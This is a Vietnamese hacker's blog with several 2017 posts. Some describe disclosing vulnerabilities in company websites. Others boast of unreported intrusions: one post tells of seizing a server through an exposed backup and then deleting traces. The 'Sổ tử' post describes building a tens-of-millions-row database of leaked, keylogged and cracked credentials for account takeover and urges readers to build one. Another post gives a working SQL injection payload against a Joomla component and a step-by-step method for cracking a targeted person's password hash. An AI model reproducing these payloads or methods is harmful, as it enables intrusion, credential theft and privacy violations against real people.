Thứ Tư, 8 tháng 11, 2017

Lỗ hổng toàn bộ hệ thống zipo.vn và trách nhiệm.

Hôm rồi tôi có phát hiện một lỗ hổng trên website chính của một cty thiết kế website khá lớn ngoài Hà Nội cho phép tôi có thể bypass các rào cản và upload trực tiếp mã độc lên thẳng server không cần phải qua bất kỳ bước xác thực nào, một lỗ hổng vô cùng nguy hiểm.

Sau đó tôi có thu thập thêm một chút info về các khách hàng của bên zipo.vn đã từng thiết kế và vẫn đang quản lý các website này thì phát hiện ra rằng tất cả những website của khách hàng cũng tồn tại chung một lỗ hổng tương tự, tới đây các bạn thử nghĩ rằng nếu tôi bắt đầu phá hoại thì thiệt hại cho cty này sẽ là không thể đong đếm được.



Hoặc nếu tôi âm thầm upload mã độc lên toàn bộ hơn 200 website này và rao bán cho các bên làm về SEO thì khả năng những site đó sẽ rớt hạng thê thảm và cty đó chắc chắn sẽ phải mất rất rất nhiều thời gian để khắc phục nó, đó chỉ là khăc phục tạm thời về mặt kỹ thuật, còn về uy tín và ảnh hưởng tới khách hàng của họ thì khả năng cao là sẽ mất khá nhiều khách hàng thậm chí nếu thiệt hại quá lớn có khả năng phá sản.

Nhưng như các bạn thường thấy thì tôi không có ý định phá hoại, tôi soạn một email thông báo về lỗ hổng và gởi cho admin cũng là người đang vận hành toàn bộ hơn 200 website này, cũng rất nhanh tôi nhận lại được email hồi âm với tinh thần trách nhiệm cao, sau đó tôi trao đổi các chi tiết lỗ hổng để bạn admin ấy nắm và tiến hành vá lỗi.

Thường thì theo kinh nghiệm của tôi thấy khi gởi cảnh báo cho các cty, hay tổ chức trước đây sẽ luôn có
- Một số bên im lặng và âm thầm vá lỗi, không một lời cảm ơn.
- Một số thì cũng rất nhanh gởi hồi âm và để đó, không vá lỗi, bỏ mặc cho khách hàng của họ muốn ra sao thì ra.
- Cũng có người hù dọa này nọ nhưng số này không đáng kể.
- Cũng có một số cá nhân reply, fix bug, cảm ơn, cũng có người donate rất hậu hĩnh, cũng có bên chỉ hứa hão, vấn đề này thường thì tôi không xem nó quan trọng.
- Và cũng có những người có tinh thần trách nhiệm rất cao, họ reply rất đàng hoàng, luôn kèm theo lời cảm ơn, dồn toàn bộ sức lực để vá lỗi cho toàn hệ thống của họ như bên zipo.vn.

Tôi thật sự đánh giá rất cao tinh thần trách nhiệm của các bạn bên zipo.vn, hơn 200 website khách hàng đã được vá lỗ hổng trong một ngày, đó là điều tuyệt vời mà tôi phải chia sẻ để các admin, các giám đốc, các admin kỹ thuật của các cty, tổ chức khác nên tham khảo và làm theo.Vì đó là quyền lợi cũng như trách nhiệm của chính các bạn.

Chúc cty các bạn ngày càng có nhiều khách hàng và luôn giữ được tinh thần trách nhiệm cũng như cái tâm của nghề nghiệp.

Concobe

Thứ Ba, 17 tháng 10, 2017

Case cũ nhàm chán, áp dụng vẫn thành công với victim lớn.

Case này trước đây mình cũng từng nhiều lần nhắc đến và có hẳn một bài nêu ra những mối nguy hại khi mắc phải cái lỗi ngớ ngẩn này, chỉ tiếc rằng hiện nay vẫn còn rất rất nhiều quản trị viên của các cty, tổ chức, hệ thống,... chưa thật sự chú trọng nó.

Mình tính không viết bài này ra nhưng tại victim này mình me cũng tính với thời gian bằng năm rồi nên khoe hàng khoe họ xíu thôi chứ chả có gì hứng thú vào thời điểm thông quan victim này nữa.

Hôm đó ngứa tay về lại victim xưa khi thấy có mẩu tin tức thông báo của họ trên facebook, ngồi nghịch nghịch lại xíu cũng không thu hoạch được gì mới, toàn những info cũ mà trước đây mình đã có rồi, tính tắt mấy cai tab trình duyệt đi thì chợt thoáng qua cái Path của thư mục chứa source code victim đó, bỗng dưng thấy có gì đó vui vui nên mình quăng vào tools, random thêm một số tên file dựa vào cái path đó và scan thử, nào ngờ nó found tới 2 kết quả của cái lỗi backup file và để đó.




Ngồi cười nhẹ cái, click link và download file backup đó về, tưởng ít ai ngờ nó nhiều bà cố file tới ~12Gb, thôi ráng động viên tinh thần và để đó cho nó download về máy xong cũng hết 3 tiếng cuộc đời với cái mạng lởm của mình.

Bắt đầu ngồi gom info từ cái đống đó, nó là bản backup của toàn bộ mã nguồn, vài cái database của hệ thống đang chạy hiện tại, thấy cũng vui vui vì có thông tin kết nối vào database của hệ thống đó.Nhưng khi thử kết nối thì lại không được, do server không cho phép kết nối từ ngoài vào, thế là lại lò mò whitebox cái đống source tự code tìm bug, sau một thời gian thì cũng tìm dc cái... cần thiết để chiếm quyền và không phụ lòng mò mẫm nó đã thành công, chiếm quyền thành công.

Vào cũng không thấy hấp dẫn gì mấy vì những thứ trên server đều nằm hết trong file backup đã download về máy rồi nên dạo dạo xíu rồi xóa hàng, kết thúc quá trình phiêu lưu ký.

Sẽ report vào một ngày đẹp trời vì thật sự với victim này mình không có hứng thú và thiện cảm mấy.Kết thúc bài chém gió vào một đêm mưa.

Thứ Tư, 11 tháng 10, 2017

An toàn thông tin và cái giá.

Sống trong thời buổi loạn lạc, thông tin là thứ quyết định gần như mọi chuyện nhưng tiếc rằng một số cá nhân vẫn chưa nhận ra điều này, cũng có những cá nhân vẫn đang xem thường sự quan trọng của nó, để đến khi đụng chuyện thì mới ngã ngửa rồi nhận ra rằng mọi thứ đã quá trễ để cứu vãn.




- Một công ty để lộ thông tin nhân viên hay những chiến lược kinh doanh thì khả năng công ty đó sẽ gặp nhiều sóng gió và tệ hại nhất sẽ là phá sản.
- Một tổ chức bí mật nếu lộ thông tin sẽ ảnh hưởng đến toàn bộ các thành viên của tổ chức, thậm chí những người liên quan cũng bị ảnh hưởng.
- Một trường học để lộ thông tin học sinh, sinh viên sẽ có nhiều em có thể bị gây hại hoặc cha mẹ bị lừa đảo tống tiền,...
- Một hệ thống website, máy chủ,... bị lộ thông tin nhảy cảm sẽ gây tổn thất nặng nề cho người sở hữu nó.
- ...

Hãy chủ động giữ an toàn cho chính mình, đừng để mất bò mới lo làm chuồng.

 Concobe

Thứ Năm, 28 tháng 9, 2017

Lỗ hổng toàn hệ thống website của vntdc.com


Note: Bận bịu quá nên mình copy luôn nội dung cái email  đã soạn để report cho bên cty web, đồng thời cũng ẩn đi một số thông tin nhạy cảm, theo mình biết thì bên cty sau khi nhận được email report đã tiến hành vá những lỗi nguy hiểm rất nhanh và triệt để, chỉ có điều hơi buồn là không ai reply lại cho mình cả.

Hôm qua mình có thấy một vài thông tin về mật khẩu của các bạn xuất hiện trên một diễn đàn chuyên brute-force hash do một thành viên của một team hack ở nước ngoài post lên với mục đích nhờ hỗ trợ brute-force và họ đã có rất nhiều kết quả được brute-force ra, qua đó mình cũng nhận biết được đây chính là những mật khẩu của website khách hàng mà các bạn đang sử dụng.

link: (...Hide...)

Trong cùng ngày 28/08/2017 thì mình quan sát đã thấy nhóm hacker này đã chiếm được toàn bộ những website mà cty các bạn đang sở hữu và upload file deface lên các site này sau đó tiến hành show off ở trang web chuyên dùng để khoe thành tích của các nhóm hacker trên thế giới.

link: http://zone-h.org/archive/notifier=black_raptor/page=1

Theo những thông tin mình nắm được thì mình có pentest thêm theo phán đoán của mình và phát hiện ra rằng hệ thống của các bạn đang tồn tại khá nhiều lỗ hổng nguy hiểm.

1. Lỗ hổng SQL Injection trên toàn bộ các website sài mã nguồn Joomla.
2. Sài chung mật khẩu cho toàn bộ tài khoản có quyền quản trị cao nhất.
3. Sài chung mật khẩu tài khoản FTP cho gần như toàn bộ hosting.


Chi tiết các lỗ hổng:

1. Lỗ hổng SQL Injection trên toàn bộ các website sài mã nguồn Joomla.

Exploit: /?option=com_vnmshop&catid=[SQLi]&Itemid=211
Poc: /?option=com_vnmshop&catid=-110 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat(user(),0x3a,version(),0x3a,database()),23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -&Itemid=211

Info: (...Hide...)

Từ những thông tin lỗ hổng này mình có thể select ra những thông tin nhạy cảm của admin và tiến hành brute-force để chiếm quyền quản trị của website các bạn đang có, giống như cách mà nhóm hacker kia đã sử dụng để tấn công hệ thống các bạn, qua đó mình có được những thông tin quan trọng ở mục 2 và 3 bên dưới

2. Sài chung mật khẩu cho toàn bộ tài khoản có quyền quản trị cao nhất.
(...Hide...)
3.Sài chung mật khẩu tài khoản FTP cho gần như toàn bộ hosting.
(...Hide...)

Lời khuyên:
- Rà soát lại toàn bộ mã nguồn của những website bị hack để tìm ra lỗ hổng khác, hoặc mã độc đã bị các hacker đó upload lên.
- Các bạn nhanh chóng fix lỗi SQLi cho toàn bộ các website mà các bạn sử dụng mã nguồn này.
- Thay đổi lại toàn bộ mật khẩu mà các bạn đang sử dụng, từ tài khoản admin tới các hostting.
- Xóa hết những tập tin deface của hacker đó upload trên hệ hống các bạn file tên: id.html dựa theo danh sách mà nhóm đó đã show off trên zone-h
- Nên update mã nguồn lên các version mới hơn, hoặc gia cố bảo mật thêm cho các website của khách hàng vd như: Đặt thêm mật khẩu bảo vệ cho thư mục /administrator/ dù nó dễ nhưng là rào cản lớn nhất cho các hacker không thể đăng nhập vào dashboard để upload mã độc và chiếm toàn quyền được.

Kết luận:
- Do mã nguồn và module các bạn code và sử dụng tồn tại lỗ hổng nguy hiểm SQLi nên đã bị hacker nước ngoài tấn công chiếm quyền.
- Thói quen sử dụng chung mật khẩu cho toàn bộ hệ thống là điều rất nguy hiểm, nhất là việc áp dụng cho toàn bộ site của khách hàng.
- Cũng rất may mắn là nhóm hacker này không thay đổi file index.php của các website mà chỉ tạo thêm file id.htm để show off, nếu không thì thiệt hại về uy tín của cty các bạn sẽ không thể đo đếm được.
- Hãy tranh thủ fix lỗ hổng càng sớm càng tốt, thay đổi mật khẩu, thêm pass bảo vệ administrator, và xóa hết những tập tin mà nhóm hacker đó để lại để tránh bị google cho site các bạn vào danh sách nguy hiểm, sẽ vô cùng phiền phức.

Concobe

Thứ Ba, 18 tháng 7, 2017

Cảm ơn BQT mmo4me.com

Chuyện xảy ra cũng rất lâu rồi hôm nay mới kể lại hì hì, số là trong một đợt tình cờ dạo trên facebook thấy có vài bài chia sẻ của các bạn của mình về diễn đàn mmo4me.com nên cũng tò mò vào xem, rồi cũng ngứa tay nên pentest thử ai ngờ tìm được vài lỗ hổng chà bá lửa.

1. SQL injection
2. Dùng user Root có full quyền quản trị Database.


Hai cái 1,2 này mà đi chung với nhau thì thật là hạnh phúc vô cùng các bạn à, ngồi select thêm vài thông tin để có cái gởi cho admin để các bạn ấy fix sớm cho khỏe, cũng có trục trặc chút xíu vì email mình gởi là email lấy trong db ra nhưng tiếc là nó không còn hữu dụng nữa, đành liên hệ qua facebook luôn, gởi thêm thông tin vào email của admin đã cho khi liên hệ trên facebook.

Rất nhanh sau đó, các bạn admin mmo4me.com đã tiến hành vá lỗ hổng và reply lại, mình cũng check lại và confirm bug đã được vá an toàn.Hai bên cũng chém gió vài thứ và chia tay, hôm sau mình nhận được một khoản donate nho nhỏ của các admin mmo4me.com, thấy vui vui hì hì.Nay mưa gió bão bùng vô tình đọc lại email nên viết vài dòng lưu dấu răng :D.




P/s: Còn rất rất nhiều những lời cảm ơn với những nhà hảo tâm đã donate khi mình gởi thông báo lỗi nhưng không thể viết lên đây hết được, xin cảm ơn các bạn, các anh chị rất nhiều.

Chủ Nhật, 16 tháng 7, 2017

Sổ tử

Đây có lẽ là một project mà tôi (Concobe) đã cất công xây dựng nên trong một khoảng thời gian không hề ngắn, với công sức bỏ ra cũng không hề nhỏ có thể nói nó được tính bằng năm chứ không còn là vài tháng nữa.



Cách đây khoảng 6 năm thì tôi đã bắt đầu có trong đầu ý tưởng tạo cho mình một nguồn tổng hợp thông tin của những người dùng trên mạng tại Việt Nam, dựa vào một bước trong quá trình pentest chuẩn của các giáo trình dạy hack nước ngoài là họ luôn đề cập đến quá trình thu thập thông tin là quan trọng và quyết định lớn nhất đến toàn bộ quá trình tấn công còn lại, tôi đã áp dụng và thấy điều này vô cùng đúng đắn cũng như có mức độ thành công khá cao ngay cả khi việc các bạn không tìm được lỗ hổng để tấn công vào hệ thống nhưng chính những thông tin các bạn đang sở hữu lại giúp đơn giản toàn bộ quá trình ấy.

Ban đầu nguồn thông tin vô cùng khó khăn và hiếm có tôi dường như phải craw rất nhiều info của các thành viên trên các diễn đàn như username, email, sdt,... và tổng hợp lại. Nhưng tôi thấy điều này vẫn chưa đủ nên tôi bắt đầu chuyển qua hướng thu thập khác hiệu quả và tốn nhiều công sức lẫn thời gian hơn đó là đi thu thập những database được các hacker công bố trên mạng và đem về tổng hợp lại, đây là một nguồn thông tin vô cùng hữu lý và thực tế đến khủng khiếp các bạn à, có được nguồn thông tin đó tôi lại tiếp tục tổng hợp và lưu trữ lại để bắt đầu vào quá trình xử lý khó khăn ở phía trước, đó là tìm cách "giải mã" những thông tin về mật khẩu đã được mã hóa trong database của rất rất nhiều mã nguồn khác nhau với nhiều thuật toán mã hóa khó nhằn để làm sao có được plaintext của càng nhiều thành viên càng tốt.

Khó khăn nhất là xử lý những nguồn thông tin mã hóa từ các diễn đàn Vbulletin ở VN với thuật toán mã hóa md5(md5($pass).$salt) tôi đã chết một cái card GPU vì cắm tool cho nó brute-force đống hash của thuật toán này :(. Sở dĩ tôi nhắm đến nguồn tài nguyên này vì vài năm trước gần như ở VN thì diễn đàn là nguồn cung cấp thông tin lớn nhất và phổ biến nhất.

Đỉnh điểm của quá trình lưu trữ là khi tôi nhận được những đường link chia sẻ database của vài trang web rất lớn ở VN với lượng thành viên lên đến hàng triệu thành viên và thật may mắn khi những nguồn này sử dụng thuật toán mã hóa mật khẩu cho thành viên bằng thuật toán MD5, tôi đã thành công khi tiến hành brute-force với nguồn hash này với tỉ lệ hơn 90% một tỉ lệ thành công khủng khiếp, có lẽ một phần là do rất nhiều các bạn có thói quen sử dụng mật khẩu không mấy phức tạp đã giúp tôi đạt được tỉ lệ đó.

Tôi cũng có được một sự ưu ái không nhỏ của một thành viên trong một diễn đàn hacking ở VN đã kết thân và chia sẻ cho tôi toàn bộ thông tin keylog mà cậu ấy đã sở hữu từ rất lâu được lưu trữ trên gmail với dung lượng ~8Gb, các bạn có thể hình dung ra nguồn info này nó quý giá và kinh khủng ra sao rồi, nhớ lại lúc xử lý đống info đó mà tôi vẫn còn thấy rùng mình, một thời oai hùng của cậu ấy chỉ với mục đích là log cho vui.

Ngoài ra tôi còn tổng hợp thông tin trên rất rất nhiều kênh chia sẻ của các hacker như thông tin keylog username, password, email của những phong trào fake login facebook, fakelogin các tài khoản game được chia sẻ tràn lan trên pastebin và các nguồn khác, chỉ cần dùng vài dork cơ bản với google thì các bạn cũng có thể có một nguồn thông tin đủ để dùng rồi.

Đến bây giờ tôi vẫn tiếp tục cập nhật (update) nguồn thông tin này vì nó thật sự hữu ích, chỉ cần biết nickname, hay email của victim là tôi bắt đầu tìm kiếm trong "sổ tử" nếu tồn tại thì khả năng trên 50% là tôi có thể sử dụng được nguồn thông tin này để tấn công leo cao hơn, do thói quen sử dụng chung một mật khẩu của rất nhiều người cho đến hiện tại và tôi nghĩ là nó sẽ không bao giờ lỗi thời.

Nguồn thông tin tôi tổng hợp hiện tại có dạng:
- username, password, email, sdt, ngày sinh ( password có 2 dạng 1 là plaintext, 2 là còn mã hóa do chưa brute-force ra)
- Được lưu trữ trong CSDL.
- Và còn rất nhiều những database khác mà tôi chưa có thời gian để xử lý chúng.

Phần mềm và nguồn wordlist tôi dùng để thực hiện gồm:
- Hashcat ( phần mềm hỗ trợ brute-force với rất nhiều thuật toán)
- Wordlist được chia sẻ rất nhiều trên mạng.
- Wordlist được chính tôi tổng hợp dựa vào chính nguồn thông tin của các thành viên như username, hay phần đầu của email mà tôi thu gom được.
- Wordlist được tạo ra dựa theo toàn bộ các đầu số điện thoại của các nhà mạng ở VN
- Wordlist ... rất nhiều =]]

Kết luận:
- Sổ tử mà tôi đang sở hữu có số lượng thông tin được tính bằng chục triệu dòng dữ liệu.
- Nếu bạn có hứng thú, hãy bắt đầu thu thập và tổng hợp, một ngày nào đó bạn sẽ thành công.
- Đây là project không dành cho những ai có tính kiên nhẫn ít và lười biếng.
- Bạn hãy luôn sài mật khẩu mạnh và đừng dùng chung một cho tất cả nhé, nếu không tôi sẽ dòm ngó bạn đấy.
- Bỏ luôn ý định dùng SDT làm mật khẩu đi, nó vô dụng với tôi rồi.
- Sổ tử đã phát huy được uy lực của nó, nhưng tôi vẫn tiếp tục update và không dừng lại.

Concobe

Thứ Tư, 5 tháng 7, 2017

pwned upload69.net



Chuyện xảy ra rồi, tôi cũng report và bên thiendia[.]com cũng fix rồi nên viết lên đây vài dòng lưu lại chút gì đó để nhớ sau này.Pwned upload69.net site upload hình ảnh của bên thiendia - lauxanh



Chỉ một tấm hình nhỏ nhưng ý nghĩa không nhỏ, ý tôi nói là cái dung lượng file backup đấy :v

Kết luận: Đôi khi chỉ cần bạn đến đúng thời điểm, bạn sẽ có cái bạn có.

Concobe

Thứ Tư, 28 tháng 6, 2017

Cơ hội cho những ai biết nắm bắt.


Có những lúc, không có lần sau, không có cơ hội bắt đầu lại.
Có những lúc, bỏ lỡ hiện tại, vĩnh viễn không còn cơ hội nữa.



Hãy nhờ rằng: Tôi luôn luôn cho các bạn cơ hội để lựa chọn.

Concobe

Thứ Hai, 19 tháng 6, 2017

Cục cảnh sát phòng chống tội phạm sử dụng công nghệ cao

TỔNG CỤC CẢNH SÁT
CỤC CẢNH SÁT PHÒNG, CHỐNG TỘI PHẠM SỬ DỤNG CÔNG NGHỆ CAO

Cục Cảnh sát phòng, chống tội phạm sử dụng công nghệ cao thuộc Tổng cục Cảnh sát, có trách nhiệm giúp Tổng Cục trưởng Tổng cục Cảnh sát chỉ đạo, kiểm tra, hướng dẫn lực lượng Cảnh sát phòng, chống tội phạm sử dụng công nghệ cao trong cả nước, tiến hành các biện pháp phòng ngừa, phát hiện, điều tra, xử lý tội phạm sử dụng công nghệ cao; trực tiếp tiến hành các biện pháp phòng ngừa, phát hiện, đấu tranh chống các hành vi vi phạm và tội phạm sử dụng công nghệ cao theo quy định của pháp luật và của Bộ trưởng Bộ Công an.





Mọi thông tin tố giác tội phạm có liên quan xin gửi về: 
Miền Bắc:
Địa chỉ: Cục Cảnh sát PCTP sử dụng Công nghệ cao, số 47 Phạm Văn Đồng, Cầu Giấy, Hà Nội.
Email: C50@canhsat.vn
Điện thoại: 069.2321161 hoặc 069.2321154
Miền Nam:
Địa chỉ: 258 Nguyễn Trãi, Q I – TPHCM
Điện thoại: 069.37125

Concobe

Thứ Bảy, 3 tháng 6, 2017

Tôi sẽ làm gì khi có được hash pass của bạn?

Đây là chút kinh nghiệm nhỏ trong tổng quan các bước tấn công một victim mà Concobe muốn chia sẻ đến cho các bạn, để phần nào các bạn hiểu được liệu cái thuật toán mã hóa mật khẩu và cái mật khẩu bạn đang sử dụng có thật sự an toàn hay không? Hãy tự mình kiểm nghiệm lại và thay đổi cho thích hợp để hạn chế những rủi ro sau này.

Note: Bài viết này chỉ áp dụng cho phần lớn thói quen của người dùng bình thường, còn các chuyên gia, các bạn khác người có thể bỏ qua.



Bỏ qua các bước tận dụng lỗ hổng, hack hiếc,...và bằng cách nào đó tôi có được cái hash là bản mã hóa của mật khẩu các bạn đang sài, câu hỏi bây giờ là.Tôi sẽ làm gì với cái hash đó để có được mật khẩu dạng rõ của bạn?

Bước 1: Đầu tiên là tôi sẽ thu gom tất tần tật những thông tin gì có liên quan đến bạn, đó là điều hiển nhiên và bắt buộc nếu tôi muốn tấn công bạn, những thông tin mà tôi sẽ chú trọng thu gom sẽ bao gồm:

1. Ngày tháng năm sinh, của bạn, vợ bạn, cha mẹ, con cái của bạn,...ngày tháng năm sinh của họ hàng gần gũi nhất với bạn.
2. Họ và tên đầy đủ của bạn, vợ bạn, cha mẹ, con cái của bạn,...của những ai là họ hàng gần gũi nhất với bạn.
3. Tên nickname của bạn và mọi người gần gũi với bạn, kể cả những tên lóng, tên gọi ở nhà,... Miễn là bạn public nó và tôi thu gom được là tôi gom sạch.
3. Số điện thoại và toàn bộ email cũng tương tự.
4. Địa chỉ nhà tôi cũng không tha nếu tôi tìm thấy nó.
5. Gom thông tin của bạn ở nhưng trang web mà bạn đã tham gia, biết đâu tôi lại tìm được thói quen của bạn thì sao :D
6. Nếu bạn có website riêng thì ngay cả cái domain của bạn tôi cũng đưa vào danh sách luôn.
7. ...Tóm lại là tôi thấy cái gì tôi sẽ gom cái đó, không từ thông tin nào mô tả hay liên quan về các bạn cả, thấy tui ghê chưa?

Bước 2:
Tôi bắt đầu xử lý hết những thông tin đã thu gom ở bước một và lọc ra những từ khóa mà tôi tự đánh giá là có khả năng trở thành một thành phần trong chuỗi mật khẩu của các bạn.
Vd:

- Nhiều bạn hay dùng ngày tháng năm sinh để làm mật khẩu lắm nè.
- Rất nhiều bạn dùng kết hợp ngày tháng năm sinh của bản thân với người yêu, vợ, con,...
- Cũng kha khá người dùng tên nickname làm mật khẩu luôn, cũng có bạn kết hợp nickname và ngày, tháng, năm sinh.
- Số điện thoại thì khỏi nói luôn, nhiều vô số kể, và kết hợp 3,4 số cuối với tên thật, nickname, email để làm mật khẩu cũng không ngoại lệ.
- Có bạn chơi luôn địa chỉ cty, địa chỉ nhà với tên đường làm mật khẩu luôn mới kinh chứ.
- Hoặc đơn giản là cái địa chỉ email, hay cái tên miền website các bạn đang sở hữu kèm theo vài biến tấu cũng rất được nhiều người ưa chuộng.
- ...Đó là đơn cử một vài những thông tin mà tôi thường chú trọng sàng lọc, rút gọn để xử lý trước.


Bước 3:
Giờ tôi sẽ bắt đầu dùng những công cụ hỗ trợ để tạo ra một cái từ điển từ chính những thông tin mà tôi sàng lọc ở bước thứ 2, kết quả sẽ là một bộ từ điển tổng hợp, kết hợp mọi tình huống, mọi trường hợp có thể có từ những từ khóa đó, kể cả những kết quả sinh ra dường như là vô nghĩa luôn.Có được cái từ điển tổng hợp này rồi thì tôi sẽ bắt đầu chuyển qua bước thứ 4.

Bước 4:
Dùng công cụ brute force và bắt đầu thử dò trên cái từ điển đã tạo ra ở bước thứ 3, lúc này chỉ là một bộ từ điển thuần khiết mà thôi một sự kết hợp của các thông tin liên quan.Khoảng 50% theo kinh nghiệm của tôi thì tới đây là tôi có thể dùng cuộc chơi được rồi, vì theo thói quen thì đa số những mật khẩu họ sài đều có trong bộ từ điển này cả.

Trừ những ai có chút cẩn thận thì họ có thể viết hoa, viết thường, thêm vài ký tự đặc biệt vào cuối mật khẩu,...đến lúc này thì sẽ khó khăn và kéo dài thời gian brute-force hơn chút xíu nhưng không sao, các công cụ đã có hỗ trợ rất tốt các vấn đề này rồi, quan trọng là bạn có chịu chơi tiếp hay không thôi :D Còn tôi thì vẫn tiếp tục chơi thêm vài trường hợp như trên, tầm khoảng 30% sẽ rụng nụ ở bước này, tức là mật khẩu của họ có kết hợp giữa các thông tin ở bước số 2 nằm trong bộ từ điển đã có ở bước số 3 kết hợp với một số thói quen tốt như viết hoa vài ký tự trong chuỗi mật khẩu, thêm vào đầu, cuối vài ký tự đặc biệt,...

Nếu qua bước này mà tôi vẫn chưa ra được mật khẩu của các bạn thì tôi sẽ trở về bước 2 để gom thêm những thông tin đã không dùng ở lần 1 vì biết đâu tôi còn thiếu chút gì đó trong đó thì sao, nếu như vẫn không thành công thì tôi sẽ xem bạn là người cẩn thận và tùy theo ngữ cảnh, nếu bạn không quan trọng thì tôi bỏ qua bạn.Còn nếu bạn quá quan trọng với tôi lúc này thì tôi sẽ phải bỏ tiền ra để nhờ những người chuyên bán dịch vụ này ở nước ngoài để họ dùng những phần cứng chuyên dụng hơn và tất nhiên thì có tiền có thể giải quyết được gần như tất cả. Đó là kinh nghiệm của tôi đấy.

Tóm lại là nếu bạn có thói quen dùng những thông tin gần gũi với bạn để làm mật khẩu mà không có biến tấu hay xào nấu gì thêm thì các bạn nên đổi lại mật khẩu mới cho an toàn.Một vài gợi ý cho việc đặt mật khẩu mà tôi đã dịch lại trước đây dựa vào những lời khuyên của các chuyên gia bảo mật của Google ở bài viết này: "Cách tạo mật khẩu mạnh cho tài khoản trên mạng."
link: http://concobexgr.blogspot.com/2016/08/cach-tao-mat-khau-manh-cho-tai-khoan.html

Phần mềm tôi hay sử dụng gồm:

1. Phần mềm tạo wordlist như crunch rất có tiếng trong giới hack pass wifi :D. Vì nhu cầu cá nhân nên tôi có sài một cái soft riêng của tôi.
2. Phần mềm để brute-force hash tôi hay dùng là hashcat (rất nổi tiếng, hỗ trợ đa nền tảng), passwordpro (đã ngừng hỗ trợ), hash manager, John the Ripper,...


Concobe

Thứ Hai, 29 tháng 5, 2017

Nên làm gì khi bạn được hacker, pentester Report lỗ hổng?

Nếu bạn quản trị một website, một hệ thống hay đơn giản chỉ là cái địa chỉ email của bạn bị lộ mật khẩu, nhưng có ai đó gởi thông tin cảnh báo lỗ hổng cho bạn thì việc đầu tiên bạn nên làm đó là kiểm tra tính thực tế và mức độ chính xác của thông tin bằng cách so sánh giữa thông tin của bạn đang có và thông tin bạn được hacker, pentester thông báo.




Nếu những thông tin đó đúng với những gì họ thông báo thì bạn nên trả lời lại người đó và xác thực là đã nhận được lời cảnh báo và xác thực lỗ hổng có tồn tại là điều tối thiểu các bạn nên làm, sau đó mới bắt đầu vào việc vá lỗ hổng ngay lập tức, đừng chần chờ hay nghĩ rằng sẽ không ai tấn công hay gây tổn hại cho các bạn cả đâu,...Suy nghĩ này vô cùng nguy hiểm và kết quả của việc thiệt hại đa phần thuộc về chính các bạn, vì sao tôi nói như thế?


Một lỗ hổng được công bố (public) trên mạng sẽ có rất rất nhiều người trên thế giới và cả quốc gia của bạn đang đặt hệ thống đó biết, không ai dám chắc rằng hệ thống của bạn sẽ an toàn với cộng đồng mạng nói chung và giới bảo mật nói riêng khi mắc lỗ hổng đó được.

Có thể bạn sẽ luôn bị theo dõi bởi đối thủ của bạn, họ luôn luôn theo sát và chờ cơ hội, khi gặp thời cơ đến thì tôi nghĩ họ sẽ không bỏ qua nó đâu,...Có vô vàn lý do để có thể dẫn đến việc tổn hại cho hệ thống khi tồn tại lỗ hổng mà chúng ta không bao giờ được xem thường nó cả, đừng bao giờ nghĩ mình cao siêu, cty mình lớn tụi nó không dám làm gì đâu, hay hệ thống mình tốt thế thách đứa nào vào được, mật khẩu mình đặt khó thế nó có lấy được cũng không giải mã ra đâu,...Tôi xin nhắc lại và nhấn mạnh rằng, có nhiều con quái vật ở ngoài căn nhà các bạn lắm, có con núp lùm, có con lộ diện và kết quả là bạn bị tổn thất chứ không phải ai khác cả.

Hãy luôn luôn thận trọng, luôn phản ứng nhanh và nhiệt tình để hệ thống được an toàn, đừng im lặng và âm thầm vá lỗ hổng của hệ thống rồi xem như chưa có chuyện gì xảy ra,...Đó là một sai lầm nghiêm trọng đấy, vì cái bạn nhận được đôi khi chỉ là một phần nhỏ hoặc những lỗ hổng mà thời điểm hiện tại bạn đang mắc phải, về lâu dài không ai đảm bảo bạn sẽ an toàn khi có thêm những lỗ hổng mới được phát hiện trên hệ thống của các bạn cả, rất rất nhiều hacker whitehat hay các pentester phàn nàn rằng họ không hề nhận được reply, hồi âm từ phía hệ thống mắc lỗ hổng, nhưng họ lại âm thầm vá lỗi như không có chuyện gì xảy ra, điều này làm cho những pentester đó cảm thấy họ không được tôn trọng, họ cảm thấy các làm việc của các bạn không hề chuyên nghiệp, chỉ biết lo cho bản thân các bạn.Và kết quả thì tôi nghĩ người chịu thiệt hại vẫn là những người quản trị hệ thống đó, sẽ không có ai giúp đỡ cho người mà họ bị "lơ", bị cho ăn "bơ" khi có lỗ hổng khác được phát hiện cả đâu, tin tôi đi đó là sự thật đấy.

Hãy nói lời cảm ơn những người đã âm thầm giúp bạn, dù chỉ là một lời cảm ơn chân thành.Đừng hù dọa họ, không có lợi cho các bạn đâu, tất cả những gì họ cần chỉ là lời cảm ơn chân thành cũng đủ rồi.

Nếu các bạn làm việc chuyên nghiệp hơn và hệ thống các bạn có tầm vóc hơn, hãy chuẩn bị những chương trình Bug bounty để tìm kiếm những pentester, whitehat hacker kiểm thử và tấn công, để tìm ra những điểm yếu còn tồn tại và gia cố hệ thống cho an toàn hơn.Hoặc cũng có thể liên hệ và ủng hộ ( donate ) người đã gởi thông báo đến cho các bạn, biết đâu các bạn sẽ nhận được thêm những thông tin quan trọng hơn, giúp hệ thống bạn an toàn hơn sau này thì sao.

Cuối cùng tôi vẫn chỉ mong các bạn đừng quên lời cảm ơn khi ai đó giúp bạn, đồng thời hãy nhanh tay vá lỗ hổng mà bạn nhận được thông báo càng sớm càng tốt.

Concobe

Thứ Năm, 27 tháng 4, 2017

Pwned diễn đàn Pubvn.tv, pubvn.net

Một ngày cuối tháng 3 hay đầu tháng 4 gì đó mình không nhớ rõ, có một bạn gởi link phim bên pubvn.tv cho mình xem vì phim này cũng hay, trước giờ mình chỉ làm thần dân bên phimmoi nên không có tài khoản và cũng không có nhu cầu về tài khoản vip ở pubvn.tv nên không xem ở diễn đàn này dù biết là website này rất nổi tiếng tại VN.Sẵn dịp có link nên click vào xem và phát hiện ra ngoài trang phim còn có thêm cái forum và máu xxx lại trỗi dậy, ngó ngang ngó dọc thấy pub sài mã nguồn Vbulletin version 4.x.x cũng khá thú vị nên test thử với những lỗ hổng đã được public thì khá hoảng khi phát hiện ra cái forum vẫn còn tồn tại cái lỗ hổng SQL Injection public từ năm ngoái :( Tiếp tục xxx vì lúc này máu nó dồn hết tới nơi cần tới rồi, lao vào chiến đấu thôi vì không thể dừng lại lúc này được :( và thế là có cái hình bên dưới.





